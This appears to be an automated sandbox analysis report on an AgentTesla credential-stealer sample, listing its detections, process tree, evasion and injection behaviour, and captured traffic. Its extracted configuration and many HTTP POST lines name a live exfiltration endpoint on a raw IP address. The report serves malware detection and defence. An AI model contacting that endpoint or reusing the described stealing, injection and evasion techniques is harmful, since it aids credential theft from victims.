Loading ...

Play interactive tourEdit tour

Windows Analysis Report DOCUMENTS.exe

Overview

General Information

Sample Name:DOCUMENTS.exe
Analysis ID:483808
MD5:f93324854461139c58e0e865ceb3c859
SHA1:3deeda7cea856d0d45ee83aeb23e000101623c32
SHA256:aaac6d698326e6fbbcd64057fbf591ef97bf143494ede008d41ab75e5a37db5a
Tags:exe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Installs a global keyboard hook
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Injects a PE file into a foreign processes
.NET source code contains very large strings
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • DOCUMENTS.exe (PID: 1864 cmdline: 'C:\Users\user\Desktop\DOCUMENTS.exe' MD5: F93324854461139C58E0E865CEB3C859)
    • schtasks.exe (PID: 4036 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ncXzBAPDBtn' /XML 'C:\Users\user\AppData\Local\Temp\tmp9BE9.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 2028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • MSBuild.exe (PID: 1488 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe MD5: 88BBB7610152B48C2B3879473B17857E)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://161.129.64.49/webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.294334493.000000000A8E8000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000000.00000002.294334493.000000000A8E8000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000009.00000002.525207312.00000000034F9000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000009.00000002.525207312.00000000034F9000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.293912263.000000000A721000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 10 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.DOCUMENTS.exe.a7c30b8.7.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.DOCUMENTS.exe.a7c30b8.7.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.DOCUMENTS.exe.a7c30b8.7.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.DOCUMENTS.exe.a7c30b8.7.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    9.2.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Possible Applocker BypassShow sources
                      Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ParentCommandLine: 'C:\Users\user\Desktop\DOCUMENTS.exe' , ParentImage: C:\Users\user\Desktop\DOCUMENTS.exe, ParentProcessId: 1864, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ProcessId: 1488

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 0.2.DOCUMENTS.exe.a7c30b8.7.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://161.129.64.49/webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: DOCUMENTS.exeReversingLabs: Detection: 17%
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\ncXzBAPDBtn.exeReversingLabs: Detection: 17%
                      Source: 9.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: DOCUMENTS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                      Source: DOCUMENTS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 458Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 458Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 458Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 458Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 458Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 458Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 458Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 458Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 460Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 460Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 458Expect: 100-continueConnection: Keep-Alive
